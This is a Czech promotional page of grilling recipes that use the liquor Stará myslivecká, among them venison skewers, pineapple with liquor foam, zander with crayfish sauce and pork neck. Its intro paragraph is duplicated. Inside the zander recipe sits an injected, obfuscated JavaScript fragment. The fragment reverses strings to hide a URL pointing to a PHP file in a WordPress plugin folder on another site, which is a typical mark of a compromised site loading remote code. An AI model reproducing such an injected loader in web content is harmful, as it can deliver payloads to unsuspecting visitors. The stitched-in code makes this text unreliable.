Stará myslivecká je legendou mezi ryze českými alkoholickými nápoji. Historie její nezaměnitelné chuti i podoby sahá až do roku 1847, kdy byla v Krásném Březně stočená první lahev s jantarově zlatým obsahem a myslivcem na vinětě. Za dobu své úspěšné existence zažila vládu již 14 českých panovníků a získala si své příznivce i za hranicemi naší země. Základ tajné receptury Staré myslivecké tvoří jemný vinný destilát z francouzské oblasti Cognac smíchaný s exotickým kořením a přírodními výluhy ze sušeného ovoce. Nezaměnitelná chuť a aroma je pak výsledkem zrání směsi v dubových sudech. Díky své zvláštní, jedinečné a ničím nenahraditelné chuti chutná velmi dobře jak při pokojové teplotě, tak vychlazená na ledu. Skvěle se hodí také do receptů na grilování. Můžete ji přidat do marinád, použít na flambování nebo z ní udělat skvělou pěnu na grilovaný ananas.
Stará myslivecká je legendou mezi ryze českými alkoholickými nápoji. Historie její nezaměnitelné chuti i podoby sahá až do roku 1847, kdy byla v Krásném Březně stočená první lahev s jantarově zlatým obsahem a myslivcem na vinětě. Za dobu své úspěšné existence zažila vládu již 14 českých panovníků a získala si své příznivce i za hranicemi naší země. Základ tajné receptury Staré myslivecké tvoří jemný vinný destilát z francouzské oblasti Cognac smíchaný s exotickým kořením a přírodními výluhy ze sušeného ovoce. Nezaměnitelná chuť a aroma je pak výsledkem zrání směsi v dubových sudech. Díky své zvláštní, jedinečné a ničím nenahraditelné chuti chutná velmi dobře jak při pokojové teplotě, tak vychlazená na ledu. Skvěle se hodí také do receptů na grilování. Můžete ji přidat do marinád, použít na flambování nebo z ní udělat skvělou pěnu na grilovaný ananas.
Dančí špíz na grilu flambovaný Starou mysliveckou podávaný s pečenými brambory v alobalu
Suroviny
800g dančí hřbet
200g domácí slanina
200g čerstvé červené papriky
1 dl Staré myslivecké
Brambory a alobal
Rozmarýn
Pepřové koření, bobkový list
and
Postup
Maso naložíme do marinády, do které jsme přidali 1 dl Staré myslivecké. Na grilu opečeme dorůžova špízy, které jsme napíchali z marinovaného masa, čerstvé papriky a domácí slaniny.
Před podáváním špízy oflambujeme Starou mysliveckou a doplníme bramborem v alobalu.
Dobrá rada. Těsně před dokončením ponechejte špíz na grilu, vezměte lahev Staré myslivecké a jemně jej zakápněte. Alkohol lehce vzplane a za okamžik je pokrm dokončen. Při flambování dbejte zvýšené opatrnosti. Správný postup naleznete na facebooku Staré myslivecké www.facebook.com/Chut MnohaTvari
Grilovaný ananas v mandlové peřince přelitý pěnou ze Staré myslivecké
Suroviny
1 větší ananas
Hnědý cukr
8 jahod
Máslo
Máta
100 g mandlových lupínků
Postup
Ananas očistíme, nakrájíme na silnější kolečka, obalíme v cukru a ogrilujeme. Hotový potřeme máslem a obalíme v mandlových lupíncích. Mezi tím, než se ananas dogriluje si připravíme pěnu ze Staré myslivecké.
and
Pěna ze Staré myslivecké
Suroviny
4 žloutky
2 dl Stará myslivecká
1,5 dl suchého bílého vína
Šťáva z půlky citronu
Cukr
Postup
Na grilu, ve vodní lázni s předem ohřátou vodou vyšleháme žloutky s vínem do husté pěny, dochutíme cukrem, citronovou šťávou a Starou mysliveckou. Rychle podáváme, aby pěna neklesla. Grilovaný ananas přelijeme pěnou a dozdobíme jahodami a mátou. Nečekaně lahodné
Grilovaný candát s račí omáčkou, zjemněnou Starou mysliveckou, zeleninové brambory
Suroviny
800 g filety z candáta
Olivový olej
Tymián
1/2 citronu
Sůl
Postup
Na gril dáme pečící papír, lehce potřeme olivovým olejem, položíme kousky candáta a pečeme. Rybu po upečení osolíme. Podáváme s račí omáčkou a s noky ze šťouchaných brambor, obalené v najemno nakrájené mrkvi a celeru.
and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandat2201.jpg“ />
Suroviny na račí omáčku
500 g malých raků
200 g kořenové zeleniny
100 g šalotky
3 dl rybího vývaru
2 lžíce protlaku
1 dl Stará myslivecká
Bobkový list, divoké koření
Olivový olej
Tymián, cukr, sůl
Postup
Nakrájenou kořenovou zeleninu a šalotku orestujeme na olivovém oleji. Přidáme koření, protlak, malé raky a zalijme rybím vývarem. Vaříme asi 2 hodiny. Omáčku přecedíme, zjemníme 2 dl smetany a na závěr 1 dl Staré myslivecké. Omáčka tak dostane výbornou chuť.
Grilovaná krkovice s grilovanou zeleninou se studenou pikantní omáčkou ochucenou Starou mysliveckou
Suroviny na grilovanou krkovici a zeleninu
4 kusy 200 g krkovice
1x čerstvá kapie
1x zelená paprika
2x česnek/ rozpůlený napůl/
1x cuketa
Tlučený pepř a sůl / solíme až je maso hotové
Suroviny na marinádu
1 dl olivového oleje
Bylinky
Worcestr
2 lžíce karamelu
1 dl Stará Myslivecká
Tlučený pepř
and
Suroviny na studenou omáčku se Starou mysliveckou
2 lžíce kečupu
Šťávu z půlky citronu
5cl smetany
5cl Stará myslivecká
Cukr
Chilli paprička
Postup
Očištěné a „odpočinuté“ maso naložíme do marinády, kde by mělo setrvat maximálně 2-3 hodiny, nikoliv déle. Následně maso opečeme na grilu. Ve chvíli, kdy je maso téměř hotové, přidáme na gril k opečení zeleninu tak, aby byla polotuhá. Maso musí zůstat pěkně růžové. Následně podáváme grilovanou krkovici spolu s grilovanou zeleninou a studenou omáčkou. Příprava marinády i studené omáčky je velice snadná. Stačí jen smíchat uvedené suroviny dohromady a dobře promíchat.